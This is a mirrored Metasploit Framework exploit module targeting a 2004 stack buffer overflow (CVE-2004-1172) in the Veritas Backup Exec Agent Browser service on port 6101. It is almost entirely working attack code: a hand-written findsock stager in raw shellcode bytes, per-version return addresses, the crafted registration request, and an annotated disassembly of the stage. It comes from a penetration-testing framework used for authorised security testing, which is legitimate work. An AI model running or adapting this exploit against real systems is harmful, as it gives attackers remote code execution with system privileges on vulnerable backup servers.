Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/backupexec/name_service.rb
19639 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Veritas Backup Exec Name Service Overflow',

16
        'Description' => %q{

17
          This module exploits a vulnerability in the Veritas Backup

18
          Exec Agent Browser service. This vulnerability occurs when a

19
          recv() call has a length value too long for the	destination

20
          stack buffer. By sending an agent name value of 63 bytes or

21
          more, we can overwrite the return address of the recv

22
          function. Since we only have ~60 bytes of contiguous space

23
          for shellcode, a tiny findsock payload is sent which uses a

24
          hardcoded IAT address for the recv() function. This payload

25
          will then roll the stack back to the beginning of the page,

26
          recv() the real shellcode into it, and jump to it. This

27
          module has been tested against Veritas 9.1 SP0, 9.1 SP1, and

28
          8.6.

29
        },

30
        'Author' => [ 'hdm' ],

31
        'License' => MSF_LICENSE,

32
        'References' => [

33
          [ 'CVE', '2004-1172'],

34
          [ 'OSVDB', '12418'],

35
          [ 'BID', '11974'],

36
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],

37
        ],

38
        'Privileged' => true,

39
        'Payload' => {

40
          'Space' => 1024,

41
          'MinNops' => 512,

42
          'StackAdjustment' => -3500,

43
        },

44
        'Platform' => %w{win},

45
        'Targets' => [

46
          [

47
            'Veritas BE 9.1 SP0/SP1', # BackupExec 9.1 SP0/SP1 return contributed by class101

48
            {

49
              'Platform' => 'win',

50
              'Rets' => [ 0x0142ffa1, 0x401150FF ], # [email protected] v9.1.4691.0 | [email protected]

51
            },

52
          ],

53
          [

54
            'Veritas BE 8.5',

55
            {

56
              'Platform' => 'win',

57
              'Rets' => [ 0x014308b9, 0x401138FF ], # [email protected] v8.50.3572 | [email protected] v8.50.3572

58
            },

59
          ],

60
        ],

61
        'DisclosureDate' => '2004-12-16',

62
        'DefaultTarget' => 0,

63
        'Notes' => {

64
          'Reliability' => UNKNOWN_RELIABILITY,

65
          'Stability' => UNKNOWN_STABILITY,

66
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

67
        }

68
      )

69
    )

70


71
    register_options(

72
      [

73
        Opt::RPORT(6101)

74
      ]

75
    )

76
  end

77


78
  def exploit

79
    connect

80


81
    print_status("Trying target #{target.name}...")

82


83
    # This will findsock/read the real shellcode (51 bytes, harcoded IAT for recv)

84
    # The IAT for recv() is for bnetns, the address is shifted by 8 bits to avoid

85
    # nulls: [0x00401150 -> 0x401150FF]

86
    stage_code = "\xfc" * 112

87
    stage_read =

88
      "\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74" +

89
      "\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11" +

90
      "\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75"

91


92
    # Configure the IAT for the recv call

93
    stage_read[29, 4] = [ target['Rets'][1] ].pack('V')

94


95
    # Stuff it all into one request

96
    stage_code[2, stage_read.length] = stage_read

97


98
    # Create the registration request

99
    req =

100
      "\x02\x00\x32\x00\x20\x00" + stage_code + "\x00" +

101
      "1.1.1.1.1.1\x00" + "\xeb\x81"

102


103
    print_status("Sending the agent registration request of #{req.length} bytes...")

104
    sock.put(req)

105


106
    print_status("Sending the payload stage down the socket...")

107
    sock.put(payload.encoded)

108


109
    print_status("Waiting for the payload to execute...")

110
    select(nil, nil, nil, 2)

111


112
    handler

113
    disconnect

114
  end

115
end

116


117


118
__END__

119
[ findsock stage ]

120
00000000  31F6              xor esi,esi

121
00000002  C1EC0C            shr esp,0xc

122
00000005  C1E40C            shl esp,0xc

123
00000008  89E7              mov edi,esp

124
0000000A  89FB              mov ebx,edi

125
0000000C  6A01              push byte +0x1

126
0000000E  8B7424FE          mov esi,[esp-0x2]

127
00000012  31D2              xor edx,edx

128
00000014  52                push edx

129
00000015  42                inc edx

130
00000016  C1E210            shl edx,0x10

131
00000019  52                push edx

132
0000001A  57                push edi

133
0000001B  56                push esi

134
0000001C  B8FF501140        mov eax,0x401150ff

135
00000021  C1E808            shr eax,0x8

136
00000024  FF10              call near [eax]

137
00000026  85C0              test eax,eax

138
00000028  7907              jns 0x31

139
0000002A  89DC              mov esp,ebx

140
0000002C  4E                dec esi

141
0000002D  85F6              test esi,esi

142
0000002F  75E1              jnz 0x12

143
00000031  FFD7              call edi

144


145